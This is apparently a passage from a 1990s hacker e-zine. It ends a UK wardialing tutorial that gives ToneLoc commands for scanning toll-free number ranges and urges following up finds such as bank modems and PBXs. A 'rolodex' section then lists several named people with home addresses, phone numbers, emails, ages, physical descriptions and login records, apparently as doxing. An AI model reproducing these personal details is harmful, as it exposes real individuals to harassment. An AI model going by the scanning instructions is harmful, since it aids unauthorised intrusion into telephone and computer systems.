provided in the *URLs* section of this paper.
Right, lets get started...We will keep the example simple by using the same
variables throughout this section. When you are actually doing your own
wardialing you will of course need to change these variables. People who have
read the ToneLoc User Docs may find some of this familiar but some people DO
NOT realise that the examples in the user docs CAN be interpreted into UK use.
For this papers example we are going to scan the 0800 666 *** range which will
provide us with 100 results. It is easy to make this scan A LOT bigger but
for times sake we are going to look at this example now.
Now we have discussed the variables of this example we can get down to using
ToneLoc.
First of all you need to restart your computer in DOS m0de and enter the
ToneLoc directory. The First thing you need to do is to set the CONFIGURATION
SETTINGS to what you require. So, open TLCFG.EXE and you will see 6 menus at
the top of the screen.
The *FILES* menu is used to change any log files that are used in the program.
You can edit the names of these log files from this menu but its easiest to
keep the names the same, from this menu you can easily see what the function of
each .log file is.
The *MODEM STRINGS* menu is used to setup the modem sequence for dialing etc.
Here is where you need to enter your dialing prefix (0800) so that the program
understands our range.
The *MODEM OPTIONS* menu is for your modem settings such as Com Port, Baud Rate,
IRQ etc. I would recommend setting your baud rate at 19200 even if you have a
faster modem, the program (due to being 4 yrs old) doesn't seem to like any
baud rate above 19200.
The *SCAN OPTIONS* are the options which you may want to change which affect
what it happening during the scan. eg. Sound, Wait Delay etc. I would recommend
the Wait Delay being quite small to make the scan run faster but remember to
keep it long enough for lines to pickup and for ToneLoc to register whether
the line is a carrier, PBX, VMB, or Normal Line.
The *COLORS* menu is just for editing the colors of the program. Nothing major
to worry about.
And finally, the *QUIT* menu is where you can chose to save or abort changes
made to the configuration file.
If you have looked through all those menus you will see that there is a lot of
different things that you can change and play with and by now, you should know
which ones to change to suit your UK Wardialing needs.
Now that you should have all the configuration of ToneLoc setup SPECIFICALLY
for your scanning needs we can get down to some major wardialing. If it is your
first time using ToneLoc you will need to just open TONELOC.EXE and read the
stuff it brings up.
As you can probably see, there are LOTS of parameters within ToneLoc that can
be used when scanning. ToneLoc allows for a lot of user choice which is
something that attracts me to using it. For example, you can easily program
the number range to scan and the number range to exclude from the scan by just
selecting a different parameter.
To scan a range of numbers in the 0800 prefix - eg. 0800-666-100 <-->
0800-666-200 the command at the DOS prompt would be :-
TONELOC 666-XXX /R:100-200
This would then scan all the numbers between 0800-666-100 and 0800-666-200 and
log the results into the log files specified in the *FILES* configuration menu.
This is the option I use the most and its the parameter I recommend you get to
know well.
Next, suppose you want to scan all the numbers between 0800-666-000 and
0800-666-999, but you had already scanned the 0800-666-100/200 section in your
last scan. This is where the EXCLUDE parameter comes into use.
TONELOC 666-XXX /D:100-200
This would result in you scanning all numbers 0800-666-000 <--> 0800-666-999
Excluding 0800-666-100 <--> 0800-666-200
If you look at the ToneLoc User Guide included in the tl110.zip you will see
this explained as well as lots of other ways to scan.
Another Favourite of mine is to use the following command line.
TONELOC 666-XXX
This will scan 0800-666-000 <---> 0800-666-999 and it will save the results to
the data file 666-XXX.dat. You must always remember to have the correct
variables added into the Configuration program.
Now that you know the basic and most used parameters of ToneLoc its time to get
Wardialing.
If you watch a wardialing session you will see that it seperatly dials each
number and tells you whats happening on screen. It will tell you when it finds
anything interesting such as a *gasp* Tone, a Carrier or a Voice and it also
appends the results to the log file so you can remember the numbers of
interesting stuff and go back and play with them later.
You must remember that the fun does not end at Wardialing, a lot of people
find wardialing and scanning boring, but I find it one of the more interesting
parts of Hacking/Phreaking as you never know when your going to be lucky enough
to jump upon a neat carrier (for a bank, hehe), a PBX or a VMB, the fun starts
here. You need to follow all your wardialing findings up and learn how to use
what you have found in a way which benefits you, after all isn't that the aim?
####
URLs
####
Below are the necessary URLs to download ToneLoc and maybe find out more
information about Wardialing in general.
First of all you will NEED a copy of ToneLoc (the wardialer I am recommending)
http://www.linenoise.org/philez/wardialers/tl110.zip
Now that you have started Wardialing in the UK, how about sharing some of your
findings or finding people who may help you on your quests and related projects.
The Linenoise WWWBoard is a place for this to come to life.
http://www.linenoise.org/wwwboard/
###
End
###
Well, thats all the Information that you need to get you going with Wardialing
in the UK and using ToneLoc successfully, just be careful and remember that
you're responsible if you fuck up, you cannot blame me, the teacher is not to
blame. In the near future I would like to c0de a Wardialer specifically for the
UK, which would be easy to use, understand and gain successful results from.
It is a project that I always keep on the back burner but if enough people
wanted to see it, I might bring it foward, let me know...
Jf_
<JF@linenoise.org>
�������������������������������������������������������������������������������
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
�������������������������������������������������������������������������������
1. p0sse.rolodex (mad outdated anyway) : juurigaveitout
�������������������������������������������������������������������������������
Alan Wilson (aka. "w1ng")
58 Moon Drive 215-305-8379 <pager>
Morrisville, PA 19069 215-736-1863 <voice>
Drexel University 215-752-1324 <SCC for his 5E>
wing@dunx1.ocs.drexel.edu
Known Sites: *.drexel.edu, *.rutgers.edu, *.delphi.com.
Short brown hair, brown eyes. Approximately 5'10 130 pounds.
Very scrawny appearence. Roughly 19 to 20 years old. Commutes
to Drexel University from his home in Morrisville. Computer
Science major. Works part time doing Data-Entry. Egomaniacle,
novice UNIX experience, short-tempered, hostile and arrogant.
Logs:
[dunx1.ocs.drexel.edu]
Login name: wing In real life: Wong Ing
Directory: /home/dunx1/under/wing Shell: /bin/sh
Last login Fri Feb 25 19:21 on ttyqf from gandalf.rutgers.edu
New mail received Sat Feb 26 12:00:09 1994;
unread since Fri Feb 25 19:27:18 1994
No Plan.
______
Don Neumann (aka. "peaboy", "speedin")
7340 Hayward Drive 216-656-1912 <voice>
Chardon, Ohio 216-650-5181 <data>
Known Sites: *.DELPHI.COM, *.MsState.edu, *.wustl.edu
16-17 years of age. Dropped out of his local High School his Senior
year. Works part time as a desk clerk at a local motel. He is not
attending a college, and presumably has no GED.
_____
Steven Dake (aka. "riley" "renegade bit head" "rbh")
1731 North Fairway
Flagstaff, Arizona 86011 602-526-9184 <home>
North Arizona University (NAU.EDU)
Email unknown.
Known Sites: herbon.connected.com, *.NAU.EDU, *.CS.UTC.EDU,
ballison.extern.ucsd.edu, *.caltech.edu.
Appearance unknown. Approximately 20-23 years of age. Computer
Science major, second of third year. He lives on campus in the
dormitories. His parents reside at the North Fairway address.
He often comes out of UTC.EDU and CONNECTED.COM.,
_____
Greg Perry (aka. "z00m" "digital hitler" "j00" "gary" "Gary Seven")
Known Sites: *.cftnet.com
_____
Lane Davis Jr. (aka. "merc")
Phoenix, Arizona 602- <home> <unlisted>
Known Sites: NAU.EDU, indirect.com, internet.com,
_____
(aka. "Sciz")
Known Sites: *.drexel.edu
6'10 155, very scrawny. Short permed blonde hair, blue or green eyes.
Freshman or Sophomore at Drexel University. Lives in a dormitory on
campus. Good friends with Alan Wilson. He rides an unregistered Honda
Motorcycle.
_____
Scott (aka. "X")
Known Sites: CAPELLA.CS.UTC.EDU, HOBBES.CS.UTC.EDU, EXPLORER.CS.UTC.EDU.
Email: X@capella.cs.utc.edu
He attends and apparently administers part(s) of the CS.UTC.EDU school
and domain. He has Brown hair, small build, 5'9" tall, about 155 pounds,
brown eyes.
_____
Chris Fisher (aka. "y", "Y-W1nD0z3")
Known Sites: uahcs2.cs.uah.edu, grendel.cs.uah.edu, tycho.cs.uah.edu
Email: cfisher@uahcs2.cs.uah.edu
Very egomaniacle. Known for harassing CERT in news groups:
] X-News: uqvax comp.security.unix:4675
] From: crfisher@nyx10.cs.du.edu (I am being repressed.)
] Subject:Cert; my what a witty bunch.
] Date: Mon, 11 Apr 94 19:52:33 GMT
] Message-ID:<1994Apr11.195233.17351@mnemosyne.cs.du.edu>
]
] Once again cert proves what a great bunch of guys they are. I guess they had
] never heard of gnufinger before...isn't it amazing that some people still
] respect them?
Logs: